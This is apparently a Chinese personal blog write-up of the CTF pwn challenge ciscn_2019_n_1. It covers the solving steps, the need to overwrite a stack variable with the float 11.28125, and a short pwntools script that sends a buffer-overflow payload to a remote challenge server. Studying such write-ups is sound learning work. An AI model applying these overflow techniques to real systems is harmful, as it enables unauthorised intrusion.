avatar

Pwn弟弟的成长日记(一)--ciscn_2019_n_1

解题思路

  1. 查看文件信息,安全机制
  2. 代码审计
  3. 分析漏洞点
  4. 编写EXP

查看文件信息,安全机制

无保护

代码审计

拖入ida查看伪代码

分析漏洞点

需要把v2的值覆盖为11.28125

跟进后看到(这里理论知识不扎实)

IEEE 754浮点数十六进制相互转换

编写exp

1
2
3
4
5
6
from pwn import *
p=remote('node3.buuoj.cn',28544)
offset=0x30-0x4
payload='a'*offset+p64(0x41348000)
p.sendline(payload)
print p.interactive()
文章作者: Sunset
文章链接: https://pwnedyu.cn/2020/04/05/Pwn%E5%BC%9F%E5%BC%9F%E7%9A%84%E6%88%90%E9%95%BF%E6%97%A5%E8%AE%B0%EF%BC%88%E4%B8%80%EF%BC%89--ciscn_2019_n_1/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sunset's blog
打赏
  • 微信
    微信
  • 支付寶
    支付寶